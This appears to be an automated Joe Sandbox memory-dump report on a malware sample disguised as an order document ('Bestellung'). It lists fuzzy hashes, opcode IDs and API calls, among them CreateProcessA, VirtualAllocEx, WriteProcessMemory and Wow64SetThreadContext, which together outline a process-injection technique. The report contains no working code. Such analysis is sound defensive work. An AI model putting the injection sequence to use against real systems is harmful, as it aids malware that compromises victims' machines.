• Source File: 00000000.00000002.1473341014.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5040000_Bestellung - 021224 - 901003637.jbxd
Similarity
• API ID:
• String ID: $'q
• API String ID: 0-3923516549
• Opcode ID: 9d724f5b38df9199f2c9133941f32af71144c2a3c65eeef381cbf087e46374ca
• Instruction ID: e53e9d0fdf8cb2b071f6826b360bb63db7bf62d043ebed2ae6dc18b7da1bf008
• Opcode Fuzzy Hash: 9d724f5b38df9199f2c9133941f32af71144c2a3c65eeef381cbf087e46374ca
• Instruction Fuzzy Hash: 6FC19F70A002098FDB44EFB8D895A6EB7F2FF84340F108979E509AF395DB74E9458B91
Strings
Memory Dump Source
• Source File: 00000000.00000002.1473341014.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5040000_Bestellung - 021224 - 901003637.jbxd
Similarity
• API ID:
• String ID: $'q
• API String ID: 0-3923516549
• Opcode ID: 8fed18a185443275569d5d9b70fce2945d7fe2db848f23ed5e32388117302c4f
• Instruction ID: 6e19386e74f985aabdd6ad7ae9a29dfc54bd02b947a5026ccd68ada7778995d3
• Opcode Fuzzy Hash: 8fed18a185443275569d5d9b70fce2945d7fe2db848f23ed5e32388117302c4f
• Instruction Fuzzy Hash: 5DC1A074A00205CFDB44EFB8D895AAEB7F2FF84340F108969E409AF395DB74E9458B91
Memory Dump Source
• Source File: 00000000.00000002.1499808314.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9800000_Bestellung - 021224 - 901003637.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 33e6b4f259fd2ed6d86a30791da6d1bf10ce22139b81d07cc7b39321b1f945a8
• Instruction ID: 760c966f7bb1867cff7b4561146719bc04bb15dae15c395699ffcc194a07594b
• Opcode Fuzzy Hash: 33e6b4f259fd2ed6d86a30791da6d1bf10ce22139b81d07cc7b39321b1f945a8
• Instruction Fuzzy Hash: 6CF1E470E05248CFD7458FA8CC627AEBBB1BF85314F14816AE595EB3D1CB349942CB92
Memory Dump Source
• Source File: 00000000.00000002.1499808314.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9800000_Bestellung - 021224 - 901003637.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: cf556f2eb6829869607d06d22aeed489a6d59a70cb5a75de21a4d12c54b14427
• Instruction ID: d4d3778aaaaf91046e2b73230fa7ea0c79fb63741e1833f5df9178134ac846ed
• Opcode Fuzzy Hash: cf556f2eb6829869607d06d22aeed489a6d59a70cb5a75de21a4d12c54b14427
• Instruction Fuzzy Hash: DBC12735A0D345CBD3418B69CC597AABBA2EFC2324F1441AEE065DF3D2C7359942C752
Memory Dump Source
• Source File: 00000000.00000002.1447897059.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fc0000_Bestellung - 021224 - 901003637.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f4bb0929c5f44b15f6edcadcf496de21ec16196614d5282c3077a77cc75d5b3e
• Instruction ID: b462da227282ca35eff1c9549849519b7f61746326a3e7867b2298a0cb6dcae0
• Opcode Fuzzy Hash: f4bb0929c5f44b15f6edcadcf496de21ec16196614d5282c3077a77cc75d5b3e
• Instruction Fuzzy Hash: 81C12972909242CFC345CF34CAA2F99BBB1FB55300756859ED4828F691C734E95AEB82
Memory Dump Source
• Source File: 00000000.00000002.1447897059.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fc0000_Bestellung - 021224 - 901003637.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 07515f09002abe760cabae6e9329206b9530cf778b636412dceb6257a331aa64
• Instruction ID: e69637971f781c78c3a0280f7edfc9f71c1b4f934595d6fc793c0d12efa38474
• Opcode Fuzzy Hash: 07515f09002abe760cabae6e9329206b9530cf778b636412dceb6257a331aa64
• Instruction Fuzzy Hash: 35C12972909246CFC345CF74CAA6F99BBB1FB06300756459FD4828F691C730E95AEB82
Memory Dump Source
• Source File: 00000000.00000002.1447897059.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fc0000_Bestellung - 021224 - 901003637.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6f86089de7b98e375f2b0e97dc8cdf3360fb076074af252fd841614395c65e23
• Instruction ID: 381dd60a492073cad39851fcc4f5e0ad12193976b4e0b424881b281095e9ef28
• Opcode Fuzzy Hash: 6f86089de7b98e375f2b0e97dc8cdf3360fb076074af252fd841614395c65e23
• Instruction Fuzzy Hash: 78B11972909246CFC341CF34CAA6F99BBB1FB05300756859ED4828F691C734E95AEB86
Memory Dump Source
• Source File: 00000000.00000002.1447897059.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fc0000_Bestellung - 021224 - 901003637.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2aa7a417beb4d721bb60bb0b5ec1ef2c4d8beb415365ba4edd8d9a9fa953e9fb
• Instruction ID: 383e6564c81190e9537ca2ef7a93706c55863568c2c77ebd6662f2742adbab50
• Opcode Fuzzy Hash: 2aa7a417beb4d721bb60bb0b5ec1ef2c4d8beb415365ba4edd8d9a9fa953e9fb
• Instruction Fuzzy Hash: C5B12972509243CFC345CF34CAA6F99BFA1FB46300756859ED4828F691C730E95AEB82
Memory Dump Source
• Source File: 00000000.00000002.1447897059.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fc0000_Bestellung - 021224 - 901003637.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0bde55f70f6a8cea7c7bf86d017c7c0c51d993c4fc54a49747ccdff0e968e714
• Instruction ID: ecd6f75d7ae2541879accea2bb4aebc1a90c7c6b0e26b5f25a82f1c88c5517fc
• Opcode Fuzzy Hash: 0bde55f70f6a8cea7c7bf86d017c7c0c51d993c4fc54a49747ccdff0e968e714
• Instruction Fuzzy Hash: D8B12972509243CFC345CF34CAA6F99BBA1FB06300756859ED4828F691C730E95AEB86
Memory Dump Source
• Source File: 00000000.00000002.1447897059.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fc0000_Bestellung - 021224 - 901003637.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 477ae5c764236a282978433f0b81dfd1cd9edf1ca0840882da0162d5b90cb602
• Instruction ID: 882b81b89f8d53746b985c3b755d195d45ec717d397a14448c823f268a61953e
• Opcode Fuzzy Hash: 477ae5c764236a282978433f0b81dfd1cd9edf1ca0840882da0162d5b90cb602
• Instruction Fuzzy Hash: 86B12972509243CFC341CF34CAA6F99BBB1FB06300756859ED4828F691C734E95AEB86
Memory Dump Source
• Source File: 00000000.00000002.1447897059.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fc0000_Bestellung - 021224 - 901003637.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: decd65c8abdb6c5406b90245add1bbffa24f8f1f1a7b0cc9ccdc3f3fae829a9c
• Instruction ID: 94ee48a5c6d8c6fdd6528469cdc6eadd69072ca984c676ddf25fa2af4c9397f7
• Opcode Fuzzy Hash: decd65c8abdb6c5406b90245add1bbffa24f8f1f1a7b0cc9ccdc3f3fae829a9c
• Instruction Fuzzy Hash: 5AB13A725092438FC385CF34CAA6F997B61FB06300756859FD4828F692C734E95AEB82
Memory Dump Source
• Source File: 00000000.00000002.1447897059.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fc0000_Bestellung - 021224 - 901003637.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5344421bcf517f0aa8bce68280004be0e63be1c72b8339aff51c701a5331cd63
• Instruction ID: f8698224e07facfd7a19d7f79f7aebb74b7101eb9a3ed214d8150857fdc0aa22
• Opcode Fuzzy Hash: 5344421bcf517f0aa8bce68280004be0e63be1c72b8339aff51c701a5331cd63
• Instruction Fuzzy Hash: 80B12972509243CFC345CF34CAA6F99BBB1FB06300756859ED4828F691C734E95AEB86
Memory Dump Source
• Source File: 00000000.00000002.1447897059.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fc0000_Bestellung - 021224 - 901003637.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d51ec791add94bf739b365d34cc4e3710fdc14e98a5d86ceea68d216bb0483cb
• Instruction ID: ed1c0ccebe4be09b6a31390c944757e0d61b3625b8dfb5d02c7e5502eceffd67
• Opcode Fuzzy Hash: d51ec791add94bf739b365d34cc4e3710fdc14e98a5d86ceea68d216bb0483cb
• Instruction Fuzzy Hash: C8B11972509243CFC345CF34CAA6F99BB61FB06300756859FD4828F692C734E95AEB86
Memory Dump Source
• Source File: 00000000.00000002.1447897059.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fc0000_Bestellung - 021224 - 901003637.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2bc8de367b3fd6045a4b4e64cc875f5d2bb3f83666911b2da95bae0df9629944
• Instruction ID: 00de9422b37513bc2bfb27828fa3159829c37625f5a94428319e1ef8025a751a
• Opcode Fuzzy Hash: 2bc8de367b3fd6045a4b4e64cc875f5d2bb3f83666911b2da95bae0df9629944
• Instruction Fuzzy Hash: FA71C275B0020A8FCB09EB78D956B6EB7B6AFC4314F14882DD406DB291CB78EC059B52
Memory Dump Source
• Source File: 00000000.00000002.1447897059.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fc0000_Bestellung - 021224 - 901003637.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e78597e9c9675ddcd275d7db6f930d95b7d0ea526768a15732c3623474043cb1
• Instruction ID: 37e4a366a5ffb019841dacc1a401ef98920a58811947dc393b39d53179c9ac61
• Opcode Fuzzy Hash: e78597e9c9675ddcd275d7db6f930d95b7d0ea526768a15732c3623474043cb1
• Instruction Fuzzy Hash: 7471AF32604207DFD384CF68C6D2F6AB7A5FB48300B62496AD506DF7A0C735ED61AB85
Memory Dump Source
• Source File: 00000000.00000002.1447897059.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fc0000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b6a105b8f643d01f33a08fc8d1e24e50221bb495f2e1196ce8efaa8ac2e030d6
                                                                            • Instruction ID: 80cd730901730b97d7325d1c179f3ccedab0425f6951947030ec5ce89f8a9ef3
                                                                            • Opcode Fuzzy Hash: b6a105b8f643d01f33a08fc8d1e24e50221bb495f2e1196ce8efaa8ac2e030d6
                                                                            • Instruction Fuzzy Hash: 7271AE32A04207CFD384CF64C6D2F6AB7A1FB48300B62496ED507DF6A1C734E961AB85
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1447897059.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_fc0000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: be38bc44b485a89027a6b005517f4abae3a1d35263b0b29723d3c826adff2145
                                                                            • Instruction ID: f8052960dccf48e0eb45ba1a9ba7942b23aad61fd1a9c62821a8aa1ea0139c0d
                                                                            • Opcode Fuzzy Hash: be38bc44b485a89027a6b005517f4abae3a1d35263b0b29723d3c826adff2145
                                                                            • Instruction Fuzzy Hash: A551C73570020A8BCB09EB78D95AB2FB6A7AFC4314B14882DD506DB795CF78EC059B52
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1499808314.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_9800000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4b886d8647377159737cc636d164276e47822f38455e527cf4c4d9858f4bf483
                                                                            • Instruction ID: ebfd960adeb350c4459aae0a2713b094529daec5ee0a942020d0df9daca467c4
                                                                            • Opcode Fuzzy Hash: 4b886d8647377159737cc636d164276e47822f38455e527cf4c4d9858f4bf483
                                                                            • Instruction Fuzzy Hash: 93611871D05229CBDB68CF66CC507EABBB6BFC9300F14D5AA940DA7291EB705A85CF40
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1499808314.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_9800000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e3fed2abede473b47d7fc2002d43804f5c0d81f915c5fa874c3a1493fcfc5430
                                                                            • Instruction ID: ed2d58b9a2d72eb8659eaf086f070c5f28392792e2dee3191285de70424e3ec9
                                                                            • Opcode Fuzzy Hash: e3fed2abede473b47d7fc2002d43804f5c0d81f915c5fa874c3a1493fcfc5430
                                                                            • Instruction Fuzzy Hash: 67613A70E042198FDB14CFA9C9915AEBBB2FF89310F248169D418EB356D7359942CFA1

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32 ref: 05040A9E
                                                                            • GetCurrentThread.KERNEL32 ref: 05040ADB
                                                                            • GetCurrentProcess.KERNEL32 ref: 05040B18
                                                                            • GetCurrentThreadId.KERNEL32 ref: 05040B71
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1473341014.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5040000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID: Current$ProcessThread
                                                                            • String ID:
                                                                            • API String ID: 2063062207-0
                                                                            • Opcode ID: d31a8d945ea0488304495285e2a908d83bb3a551f2df35cf21b4a245327fdbc8
                                                                            • Instruction ID: 7f39c4646f271156d42a2f13c3dba04222c92ade47279ea285eb2f2894368f3b
                                                                            • Opcode Fuzzy Hash: d31a8d945ea0488304495285e2a908d83bb3a551f2df35cf21b4a245327fdbc8
                                                                            • Instruction Fuzzy Hash: 885188B49003498FEB44CFA9D948BDEBBF1FF88314F248459E509AB2A0C7789944CF65

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32 ref: 05040A9E
                                                                            • GetCurrentThread.KERNEL32 ref: 05040ADB
                                                                            • GetCurrentProcess.KERNEL32 ref: 05040B18
                                                                            • GetCurrentThreadId.KERNEL32 ref: 05040B71
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1473341014.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5040000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID: Current$ProcessThread
                                                                            • String ID:
                                                                            • API String ID: 2063062207-0
                                                                            • Opcode ID: 6128e3160626d93305cee769d6c7edb457f866e4f95541c55efbcfaa3f47cd75
                                                                            • Instruction ID: f2ea109bc8352d40897798108f2f45411d550be14e9869f5446d322d98e3328d
                                                                            • Opcode Fuzzy Hash: 6128e3160626d93305cee769d6c7edb457f866e4f95541c55efbcfaa3f47cd75
                                                                            • Instruction Fuzzy Hash: 425177B49003498FEB54CFA9D948B9EBBF1FF88314F208459E509B72A0D778A944CF65

                                                                            Control-flow Graph
                                                                            • Basic blocks 980b454 through 980b7a5; CreateProcessA is called from block 980b5ef-980b6a9
                                                                            APIs
                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0980B696
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1499808314.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_9800000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID: CreateProcess
                                                                            • String ID:
                                                                            • API String ID: 963392458-0
                                                                            • Opcode ID: 0c76bc192b9fd4c5d95ff1f45e6de3bddd83108068f35a7e54488770cd50bfc8
                                                                            • Instruction ID: ab6db8829fe4dd9ffac12a39334ea9386c9419c5d888582ac55369e82d85135f
                                                                            • Opcode Fuzzy Hash: 0c76bc192b9fd4c5d95ff1f45e6de3bddd83108068f35a7e54488770cd50bfc8
                                                                            • Instruction Fuzzy Hash: 60A14B71D003198FEF54CFA8CC517AEBBB2AF88310F1485A9E819E7280DB749985CF91

                                                                            Control-flow Graph
                                                                            • Basic blocks 980b460 through 980b7a5; CreateProcessA is called from block 980b5ef-980b6a9
                                                                            APIs
                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0980B696
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1499808314.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_9800000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID: CreateProcess
                                                                            • String ID:
                                                                            • API String ID: 963392458-0
                                                                            • Opcode ID: bd6c1bf76d9da4d07036e6082661b19e646a6d2bfc2e41a94958ed7fd65bfdd8
                                                                            • Instruction ID: ebecbfd62eef41719f984811ff63cf99d1e41f89cd94116e342a4ae240d64a13
                                                                            • Opcode Fuzzy Hash: bd6c1bf76d9da4d07036e6082661b19e646a6d2bfc2e41a94958ed7fd65bfdd8
                                                                            • Instruction Fuzzy Hash: 6F913B71D003198FEF54CFA8CC51BAEBBB2AF84710F1485A9E819E7280DB749985CF91

                                                                            Control-flow Graph
                                                                            • Basic blocks 50451e7 through 5045361; CreateWindowExW is called from block 50452b3-5045312
                                                                            APIs
                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05045302
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1473341014.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5040000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID: CreateWindow
                                                                            • String ID:
                                                                            • API String ID: 716092398-0
                                                                            • Opcode ID: fb25c541550092cab3499af4791b85ea6e960471ca50b81a8b4254fc1baebc3b
                                                                            • Instruction ID: 49a333e4b30ceb63a0013adeefc2c0acb10b9948c9f43b37557f48f3463d9856
                                                                            • Opcode Fuzzy Hash: fb25c541550092cab3499af4791b85ea6e960471ca50b81a8b4254fc1baebc3b
                                                                            • Instruction Fuzzy Hash: 6251AFB1D10349DFDB14CFA9D884ADEBBF6BF48310F24812AE819AB250D775A945CF90

                                                                            Control-flow Graph
                                                                            • Basic blocks 50451f0 through 5045361; CreateWindowExW is called from block 5045273-5045312
                                                                            APIs
                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05045302
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1473341014.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5040000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID: CreateWindow
                                                                            • String ID:
                                                                            • API String ID: 716092398-0
                                                                            • Opcode ID: 64afc800afd666d25c080e30d8ac839e2ecad4285996b58740c46b0087c8ead1
                                                                            • Instruction ID: d5518a79cc4d2e592ed70dc0a621dc1a3e01cdb96d65e6352550889b963c80cb
                                                                            • Opcode Fuzzy Hash: 64afc800afd666d25c080e30d8ac839e2ecad4285996b58740c46b0087c8ead1
                                                                            • Instruction Fuzzy Hash: 6C41C0B1D103489FDB14CF9AD884ADEBBF6BF48310F24812AE819AB250D774A845CF90

                                                                            Control-flow Graph
                                                                            • Basic blocks fc8e34 through fc8f89; CreateActCtxA is called from block fc8e40-fc8f01
                                                                            APIs
                                                                            • CreateActCtxA.KERNEL32(?), ref: 00FC8EF1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1447897059.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_fc0000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            • Opcode ID: 8c2949a48c139432747dc9c98324b71936fa7a6a9bcd48ba7867a2e0fb7359a2
                                                                            • Instruction ID: 3e15e4f06f2220b26adcd5f1a2255c7875a066bef06b8b073088e15247e354a0
                                                                            • Opcode Fuzzy Hash: 8c2949a48c139432747dc9c98324b71936fa7a6a9bcd48ba7867a2e0fb7359a2
                                                                            • Instruction Fuzzy Hash: D941C274C00719CFEB24CFA9C845B8EBBB6BF49714F24806ED408AB251DB756946CF91

                                                                            Control-flow Graph
                                                                            • Basic blocks 5042e5c through 50478dc; calls 5042d34 from block 50478ac-50478cc and CallWindowProcW from block 504785a-5047892
                                                                            APIs
                                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 05047881
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1473341014.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5040000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID: CallProcWindow
                                                                            • String ID:
                                                                            • API String ID: 2714655100-0
                                                                            • Opcode ID: 710df3052b6f361d1eb9a5e0f07a12402e5e8a4ef4333a7acd28c7f0dae39ce5
                                                                            • Instruction ID: 4d24cd22774a216aeb38790e9b36f762491eb0ba89477604a90cdbcae2eb6c31
                                                                            • Opcode Fuzzy Hash: 710df3052b6f361d1eb9a5e0f07a12402e5e8a4ef4333a7acd28c7f0dae39ce5
                                                                            • Instruction Fuzzy Hash: 4C4119B9A003059FDB14CF99D888AAEBBF5FF88314F24845DD519A7321D374A845CFA0

                                                                            Control-flow Graph
                                                                            • Basic blocks fc79dc through fc8f89; CreateActCtxA is called from block fc79dc-fc8f01
                                                                            APIs
                                                                            • CreateActCtxA.KERNEL32(?), ref: 00FC8EF1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1447897059.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_fc0000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            • Opcode ID: 49b76826342802dd59b4e871e408c3869dd886dd4176cc1184e086e4e702d833
                                                                            • Instruction ID: 3913130fd67d896c61ce552968b74a8e430ef2a700f2bc57db4220f40c4a64cb
                                                                            • Opcode Fuzzy Hash: 49b76826342802dd59b4e871e408c3869dd886dd4176cc1184e086e4e702d833
                                                                            • Instruction Fuzzy Hash: DF41D474C00719CFDB24CFA9C944B8EBBB6BF49704F20806ED408AB251DB756946CF90

                                                                            Control-flow Graph
                                                                            • Basic blocks 980b1d1 through 980b2ae; WriteProcessMemory is called from block 980b236-980b275
                                                                            APIs
                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0980B268
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1499808314.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_9800000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID: MemoryProcessWrite

                                                                            Control-flow Graph (graph image not reproduced; blocks marked Executed / Not Executed)
                                                                            APIs
                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0980B268
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1499808314.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_9800000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID: MemoryProcessWrite

                                                                            Control-flow Graph (graph image not reproduced; blocks marked Executed / Not Executed)
                                                                            APIs
                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0980ACB6
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1499808314.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_9800000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID: ContextThreadWow64

                                                                            Control-flow Graph (graph image not reproduced; blocks marked Executed / Not Executed)
                                                                            APIs
                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0980B348
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1499808314.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_9800000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID: MemoryProcessRead

                                                                            Control-flow Graph (graph image not reproduced; blocks marked Executed / Not Executed)
                                                                            APIs
                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 050410F7
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1473341014.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5040000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID: DuplicateHandle
                                                                            APIs
                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0980ACB6
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1499808314.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_9800000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID: ContextThreadWow64
                                                                            APIs
                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0980B348
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1499808314.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_9800000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID: MemoryProcessRead
                                                                            APIs
                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 050410F7
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1473341014.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5040000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID: DuplicateHandle
                                                                            APIs
                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0980B186
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1499808314.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_9800000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
